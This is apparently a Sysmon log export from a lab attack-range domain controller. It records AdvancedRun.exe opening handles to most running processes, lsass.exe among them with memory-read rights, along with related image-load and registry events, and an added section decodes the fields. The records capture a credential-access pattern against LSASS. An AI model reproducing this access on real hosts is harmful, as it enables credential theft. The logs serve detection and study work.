20:17:51.461{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080472Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.461{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program 
Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080471Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.461{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080470Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.461{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080469Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.461{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004080468Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
Decoded Sysmon records for this part of the export. The extraction ran each event's XML fields together with no separators; the same events are listed below with their fields labelled, in the order exported (newest EventRecordID first). This part of the export opens mid-record: the header (EventRecordID) of the first ProcessAccess record sits on the preceding line, and the last header below has its body on the following line. Field order follows the Sysmon v3 schema for Event ID 10 (ProcessAccess): RuleName, UtcTime, SourceProcessGUID, SourceProcessId, SourceThreadId, SourceImage, TargetProcessGUID, TargetProcessId, TargetImage, GrantedAccess, CallTrace, SourceUser, TargetUser; and for Event ID 7 (ImageLoad): RuleName, UtcTime, ProcessGuid, ProcessId, Image, ImageLoaded, FileVersion, Description, Product, Company, OriginalFileName, Hashes, Signed, Signature, SignatureStatus, User.

Values shared by every ProcessAccess record below:
  EventID 10 (ProcessAccess), Version 3, Level 4 (Informational), Task 10, Opcode 0, Keywords 0x8000000000000000
  Channel            Microsoft-Windows-Sysmon/Operational
  Computer           win-dc-mhaag-attack-range-139.attackrange.local
  RuleName           -
  SourceProcessGUID  {834264DD-14CE-61EB-9F08-000000002702}
  SourceProcessId    4792
  SourceThreadId     1520
  SourceImage        C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  SourceUser         ATTACKRANGE\Administrator
  CallTrace          C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)

GrantedAccess decodes as: 0x1410 = PROCESS_VM_READ (0x10) | PROCESS_QUERY_INFORMATION (0x400) | PROCESS_QUERY_LIMITED_INFORMATION (0x1000); 0x1000 = PROCESS_QUERY_LIMITED_INFORMATION alone. The three 0x1000 records (services.exe, csrss.exe, wininit.exe) carry the CallTrace above with one difference: the AdvancedRun.exe frame directly after KERNELBASE.dll reads +ab6d instead of +ab4b, so the handle was granted from a different return point in the tool, consistent with a 0x1410 request being refused and re-issued with query-limited rights. The trace bottoms out in USER32.dll frames marked (wow64), so the handles are opened from the 32-bit tool's window-message loop. All 24 ProcessAccess records fall within 7 ms (20:17:51.453 to 20:17:51.460) and cover most processes on the host, lsass.exe included, which is opened with a mask that carries PROCESS_VM_READ.

EventRecordID     UtcTime (2022-01-21)  TargetProcessGUID                       TargetProcessId  TargetImage                        GrantedAccess  TargetUser
(preceding line)  20:17:51.460          {834264DD-DAF5-61EA-3000-000000002702}  668              C:\Windows\system32\svchost.exe    0x1410         NT AUTHORITY\SYSTEM
4080467           20:17:51.460          {834264DD-DAF5-61EA-2F00-000000002702}  2440             C:\Windows\system32\svchost.exe    0x1410         NT AUTHORITY\SYSTEM
4080466           20:17:51.460          {834264DD-DAF4-61EA-2D00-000000002702}  2988             C:\Windows\System32\spoolsv.exe    0x1410         NT AUTHORITY\SYSTEM
4080465           20:17:51.460          {834264DD-DAF2-61EA-2C00-000000002702}  2896             C:\Windows\system32\conhost.exe    0x1410         NT AUTHORITY\SYSTEM
4080464           20:17:51.460          {834264DD-DAF2-61EA-2B00-000000002702}  2888             C:\Users\Public\splunkd.exe        0x1410         NT AUTHORITY\SYSTEM
4080463           20:17:51.460          {834264DD-DAF0-61EA-2900-000000002702}  2760             C:\Windows\System32\svchost.exe    0x1410         NT AUTHORITY\SYSTEM
4080462           20:17:51.460          {834264DD-DAE8-61EA-2000-000000002702}  1516             C:\Windows\system32\svchost.exe    0x1410         NT AUTHORITY\NETWORK SERVICE
4080461           20:17:51.459          {834264DD-DAE7-61EA-1800-000000002702}  1384             C:\Windows\system32\svchost.exe    0x1410         NT AUTHORITY\LOCAL SERVICE
4080460           20:17:51.459          {834264DD-DAE7-61EA-1700-000000002702}  1300             C:\Windows\System32\svchost.exe    0x1410         NT AUTHORITY\SYSTEM
4080459           20:17:51.459          {834264DD-DAE7-61EA-1600-000000002702}  1264             C:\Windows\system32\svchost.exe    0x1410         NT AUTHORITY\LOCAL SERVICE
4080458           20:17:51.459          {834264DD-DAE7-61EA-1500-000000002702}  1064             C:\Windows\system32\svchost.exe    0x1410         NT AUTHORITY\NETWORK SERVICE
4080457           20:17:51.459          {834264DD-DAE7-61EA-1400-000000002702}  352              C:\Windows\System32\svchost.exe    0x1410         NT AUTHORITY\LOCAL SERVICE
4080456           20:17:51.459          {834264DD-DAE7-61EA-1300-000000002702}  832              C:\Windows\system32\svchost.exe    0x1410         NT AUTHORITY\LOCAL SERVICE
4080455           20:17:51.459          {834264DD-DAE7-61EA-1200-000000002702}  820              C:\Windows\system32\dwm.exe        0x1410         Window Manager\DWM-1
4080454           20:17:51.458          {834264DD-DAE7-61EA-1100-000000002702}  488              C:\Windows\System32\svchost.exe    0x1410         NT AUTHORITY\SYSTEM
4080453           20:17:51.458          {834264DD-DAE7-61EA-1000-000000002702}  92               C:\Windows\System32\svchost.exe    0x1410         NT AUTHORITY\NETWORK SERVICE
4080452           20:17:51.458          {834264DD-DAE7-61EA-0F00-000000002702}  364              C:\Windows\system32\LogonUI.exe    0x1410         NT AUTHORITY\SYSTEM
4080451           20:17:51.457          {834264DD-DAE6-61EA-0E00-000000002702}  932              C:\Windows\system32\svchost.exe    0x1410         NT AUTHORITY\NETWORK SERVICE
4080447           20:17:51.456          {834264DD-DAE6-61EA-0D00-000000002702}  876              C:\Windows\system32\svchost.exe    0x1410         NT AUTHORITY\SYSTEM
4080446           20:17:51.455          {834264DD-DAE4-61EA-0C00-000000002702}  652              C:\Windows\system32\lsass.exe      0x1410         NT AUTHORITY\SYSTEM

EventRecordID 4080439  EventID 7 (ImageLoad), Version 3, Level 4, Task 7, Opcode 0, Keywords 0x8000000000000000; same Channel, Computer and RuleName as above
  UtcTime           2022-01-21 20:17:51.447
  ProcessGuid       {834264DD-14CE-61EB-9F08-000000002702}
  ProcessId         4792
  Image             C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  ImageLoaded       C:\Windows\SysWOW64\wtsapi32.dll
  FileVersion       10.0.14393.0 (rs1_release.160715-1616)
  Description       Windows Remote Desktop Session Host Server SDK APIs
  Product           Microsoft® Windows® Operating System
  Company           Microsoft Corporation
  OriginalFileName  wtsapi32.dll
  Hashes            MD5=55D5450C85C0A0DE8F2A22F2C0C816AE,SHA256=3CF7B03BEB7C47157C47EACEBFB731096468D1D25FF6784485EFD2FB806C4C5E
  Signed            true
  Signature         Microsoft Windows
  SignatureStatus   Valid
  User              ATTACKRANGE\Administrator

EventRecordID     UtcTime (2022-01-21)  TargetProcessGUID                       TargetProcessId  TargetImage                        GrantedAccess  TargetUser
4080425           20:17:51.454          {834264DD-DAE4-61EA-0A00-000000002702}  628              C:\Windows\system32\services.exe   0x1000         NT AUTHORITY\SYSTEM
4080423           20:17:51.453          {834264DD-DAE4-61EA-0900-000000002702}  576              C:\Windows\system32\winlogon.exe   0x1410         NT AUTHORITY\SYSTEM
4080422           20:17:51.453          {834264DD-DAE4-61EA-0800-000000002702}  500              C:\Windows\system32\csrss.exe      0x1000         NT AUTHORITY\SYSTEM
4080421           20:17:51.453          {834264DD-DAE4-61EA-0700-000000002702}  492              C:\Windows\system32\wininit.exe    0x1000         NT AUTHORITY\SYSTEM

EventRecordID 4080420  EventID 10 (ProcessAccess), Version 3, Level 4, Task 10, Opcode 0, Keywords 0x8000000000000000; same Channel, Computer and RuleName; UtcTime date 2022-01-21 (the time of day and the remaining EventData fields of this record are on the next line of the export)
20:17:51.453{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080419Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.452{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000004080418Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.452{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft 
WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004080417Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.451{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 13241300x80000000000000004080352Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-21 20:17:31.016{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKU\S-1-5-21-1639301002-1587250067-194500343-500_Classes\Local Settings\MuiCache\121\52C64B7E\LanguageListBinary DataATTACKRANGE\Administrator 
13241300x80000000000000004080351Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-21 20:17:31.014{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKU\S-1-5-21-1639301002-1587250067-194500343-500_Classes\Local Settings\MuiCache\121\52C64B7E\LanguageListBinary DataATTACKRANGE\Administrator 12241200x80000000000000004080350Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:17:31.011{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKCR\WOW6432Node\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\InstanceATTACKRANGE\Administrator 12241200x80000000000000004080349Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:17:31.011{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKCR\WOW6432Node\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\InstanceATTACKRANGE\Administrator 12241200x80000000000000004080348Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:17:31.010{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKCR\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\InstanceATTACKRANGE\Administrator 12241200x80000000000000004080347Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:17:31.010{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKCR\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\InstanceATTACKRANGE\Administrator 13241300x80000000000000004080344Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-21 
20:17:31.009{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKU\S-1-5-21-1639301002-1587250067-194500343-500_Classes\Local Settings\MuiCache\121\52C64B7E\LanguageListBinary DataATTACKRANGE\Administrator 13241300x80000000000000004080343Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-21 20:17:31.003{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKU\S-1-5-21-1639301002-1587250067-194500343-500_Classes\Local Settings\MuiCache\121\52C64B7E\LanguageListBinary DataATTACKRANGE\Administrator 12241200x80000000000000004080342Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:17:31.002{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\DelegateFoldersATTACKRANGE\Administrator 12241200x80000000000000004080341Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:17:31.002{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpaceATTACKRANGE\Administrator 